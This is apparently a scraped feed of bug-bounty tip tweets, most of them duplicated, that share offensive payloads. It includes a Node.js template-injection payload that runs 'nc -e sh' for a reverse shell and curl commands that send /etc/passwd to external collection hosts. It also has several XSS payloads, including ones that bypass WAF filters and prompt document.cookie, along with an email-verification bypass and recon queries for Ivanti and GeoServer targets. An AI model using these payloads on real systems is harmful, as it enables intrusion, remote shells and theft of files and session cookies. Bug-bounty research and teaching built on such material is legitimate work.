Will Gates(@WllGates) 's Twitter Profile Photo

๐Ÿšจ If you discover a node.js template area, you should try triggerable node payload ๐Ÿ˜‰; require('child_process').exec('nc -e sh ip port');{src:/bin/sh/}

so you can get RCE ๐Ÿ˜„

credit: ๐ฐš๐ฐผ๐ฐ‡๐ฑ…

s

๐Ÿšจ If you discover a node.js template area, you should try triggerable node payload ๐Ÿ˜‰; require('child_process').exec('nc -e sh ip port');{src:/bin/sh/}

so you can get RCE ๐Ÿ˜„

credit: @ynsmroztas 

#bugbountytip #bugbountytips
account_circle
Will Gates(@WllGates) 's Twitter Profile Photo

An upload area, command area, input area or anywhere can sometimes give incredible results;

curl http:// ***. oastify . com -d 'data=$(cat /etc/passwd)'

or

curl https:// webhook . site/*** -d 'data=$(cat /etc/passwd)'
)

credit: ๐ฐš๐ฐผ๐ฐ‡๐ฑ…

An upload area, command area, input area or anywhere can sometimes give incredible results;

curl http:// ***. oastify . com -d 'data=$(cat /etc/passwd)'

or 

curl https:// webhook . site/*** -d 'data=$(cat /etc/passwd)'
)

credit: @ynsmroztas 

#BugBounty  #bugbountytip
account_circle
Will Gates(@WllGates) 's Twitter Profile Photo

๐Ÿ”ฅHackerone got hacked! How can I steal your POC? ๐Ÿฅท๐Ÿป

โ€ข Weakness - Sensitive Information Disclosure
โ€ข Bounty - $15,000 ๐Ÿ’ธ
โ€ข CC - Hasyim

Critical bugs directly upstream (Hackerone) as a bug bounty platform.

credit: Abhishek Meena - {๐Ÿ”ฅ}


kresec.medium.com/hackerone-got-โ€ฆ

account_circle
Divyansh Sharma(@divyansh2401) 's Twitter Profile Photo

Yay, I was awarded a $2,000 bounty on HackerOne! hackerone.com/divyansh2401 tips tip

1. Bypassed email verification with IP-Rotator Extension.
2. Created an account with [email protected].
3. Auto Joined their organization.

Yay, I was awarded a $2,000 bounty on @Hacker0x01! hackerone.com/divyansh2401 #TogetherWeHitHarder #bugbounty #bugbountytips #bugbountytip

1. Bypassed email verification with IP-Rotator Extension. 
2. Created an account with divyansh@target.com. 
3. Auto Joined their organization.
account_circle
๐ฐš๐ฐผ๐ฐ‡๐ฑ…(@ynsmroztas) 's Twitter Profile Photo

There may be services where geoserver vulnerabilities are still not updated, so you can search /geoserver/ows with gau or wayback and try your luck.

~ waybackurl domain[.]com | grep '/geoserver/ows/'

github.com/win3zz/CVE-202โ€ฆ
tip

There may be services where geoserver vulnerabilities are still not updated, so you can search /geoserver/ows with gau or wayback and try your luck. 

~ waybackurl domain[.]com | grep '/geoserver/ows/'

github.com/win3zz/CVE-202โ€ฆ
#bugbountytip #bugbounty
account_circle
MrDott(@MrDott_) 's Twitter Profile Photo

(Filter+Cloudflare bypassed) Stored XSS leads account takeover

Payload: xyz';'/></textarea><Img Src=OnXSS OnError=prompt(document.cookie)>

Tips: Always play with reflecting value's tags.
tip

Assist Cred. KNOXSS

(Filter+Cloudflare bypassed) Stored XSS leads account takeover

Payload: xyz';'/></textarea><Img Src=OnXSS OnError=prompt(document.cookie)>

Tips: Always play with reflecting value's tags.
#bugbountytip #bugbounty

Assist Cred. @KN0X55
account_circle
Zayed ๐Ÿ‡ต๐Ÿ‡ธ(@D0L0RESH4Z3) 's Twitter Profile Photo

API Hacking Tips
check for these endpoints
/redoc
/openapi.json
/swagger.json
/docs
if u found openapi.json or swagger.json just import the file in Postman and configure the Postman proxy to the same as burp
tip tip s

API Hacking Tips
check for these endpoints
/redoc
/openapi.json
/swagger.json
/docs
if u found openapi.json or swagger.json just import the file in Postman and configure the Postman proxy to the same as burp
#bugbountytip #bugbounty #bugbountytips
account_circle
Will Gates(@WllGates) 's Twitter Profile Photo

๐Ÿค”Many people have often asked me how to search for 'ivanti', for shodan you can search as title:'Ivanti Connect' hostname:'target.*'

credit: ๐ฐš๐ฐผ๐ฐ‡๐ฑ…

tip

๐Ÿค”Many people have often asked me how to search for 'ivanti', for shodan you can search as title:'Ivanti Connect' hostname:'target.*'

credit: @ynsmroztas 

#bugbountytip #bugbounty
account_circle
Otterly(@ott3rly) 's Twitter Profile Photo

Sometimes when arjun does not work properly for parameter guessing, I use ffuf instead:
ffuf -u 'https://target\.com/payment.php?FUZZ=regular' -w ~/wordlists/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt

tip tips

Sometimes when arjun does not work properly for parameter guessing, I use ffuf instead:
ffuf -u 'https://target\.com/payment.php?FUZZ=regular' -w ~/wordlists/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt

#bugbounty #bugbountytip #bugbountytips
account_circle
Invent Your Shit(@inventyourshit) 's Twitter Profile Photo

Check out the latest post on Invent Your Shit on exploiting Authentication Bypasses vulnerability in Webgoat Labs.

Here: inventyourshit.com/webgoat-authenโ€ฆ

Check out the latest post on Invent Your Shit on exploiting Authentication Bypasses vulnerability in Webgoat Labs.

Here: inventyourshit.com/webgoat-authenโ€ฆ

#ctf #Webgoat #webhacking #bugbountytip #bugbouny #Hacking #AuthenticationBypass
account_circle
Sergio Medeiros(@grumpzsux) 's Twitter Profile Photo

XSS Bypass - working on ASPNET Generic Microsoft WAF (detected by AFW00F)

<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc(`VulneravelXSS`%26%2300000000000000000041//

Tag the original creator below so I can give them some hacker clout.

tip

XSS Bypass - working on ASPNET Generic Microsoft WAF (detected by AFW00F)

<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc(`VulneravelXSS`%26%2300000000000000000041// 

Tag the original creator below so I can give them some hacker clout.

#bugbounty #bugbountytip
account_circle
Ahmad Bin Ali ๐ŸŽ“2020๐Ÿ‡ธ๐Ÿ‡ฆ(@MrHex88) 's Twitter Profile Photo

could be be triggers in itself, no need to parameter injectionโœŒ๐Ÿป

Payloads:
1-
%3Csvg%20onload=alert(%22MrHex88%22)%3E

2-
%3Cimg%20src=x%20onerror=alert(%22MrHex88%22)%3E

tip tips

#XSS could be be triggers in #url itself, no need to parameter injectionโœŒ๐Ÿป

Payloads:
1-
%3Csvg%20onload=alert(%22MrHex88%22)%3E

2-
%3Cimg%20src=x%20onerror=alert(%22MrHex88%22)%3E

#bugbounty #bugbountytip #bugbountytips
#MrHex88
account_circle